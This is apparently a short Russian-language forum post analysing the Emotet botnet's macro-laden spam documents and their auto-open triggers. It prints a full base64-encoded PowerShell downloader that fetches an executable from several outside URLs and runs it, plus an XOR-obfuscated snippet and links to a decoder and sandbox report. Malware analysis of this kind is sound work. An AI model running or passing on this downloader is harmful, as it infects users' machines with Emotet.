Всем привет! Решил разобрать техники которые использует ботнет emotet, как правило они однотипно и при массовости работают, но на деле они очень сильно переюзаны.
Как я понимаю emotet для спама, выбрали именно макросы, потому что они являются наиболее большей угрозой и сложнее к исправлению, легче идти по социальной инженерии, чем бороться с патчами.
И действительно крайне эффективными являются их стилизация документа.
С виду документ ни чем не отличается от обычного, но есть одно но
Из чего же состоит макрос? да там все очень просто, вид макроса достаточно простой. Сгенерировать и определить такое может каждый
Возьмем классическую полезную нагрузку
Код:
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
Код:
(( 49 , 111,66 , 65 ,40,123,112, 98,56 , 122 ,119, 127,112 , 118 , 97, 53,91 , 112 ,97,59 ,66 , 112,119,86 ,121, 124, 112, 123, 97, 46, 49 , 111 , 64 , 65 , 40 , 50 ,125,97 ,97 ,101 ,47 ,58 , 58, 123,114 ,112,123 , 116 ,59 , 118 ,122,59,111 103 ,90, 60,46,70, 97 , 116 ,103 , 97,56 ,69, 103, 122,118 , 112,102, 102, 53, 49,101,103 ,90 , 46 ,119 , 103, 112 , 116, 126 ,46,104,118, 116 ,97, 118 , 125, 110, 104 ,104)|foREACh-oBJeCT { [CHAr] ($_ -BxOr'0x15') } )https://github.com/bauldini/Emotet-Decode - decoder
Подробнее что такое macros on open: ничего сверхразумного здесь нету это тот же макрос который использует Aut
pen( ) или же Workbook_Open ( ), да я знаю про это было рассказывать бессмысленно и обломал весь кайф.
сам emotet:
https://app.any.run/tasks/0b787e4f-d684-46c4-b193-5aa3f473eb89/
ничего особенного и необычного здесь разумеется нет. Статьей конечно это не назвать но информация есть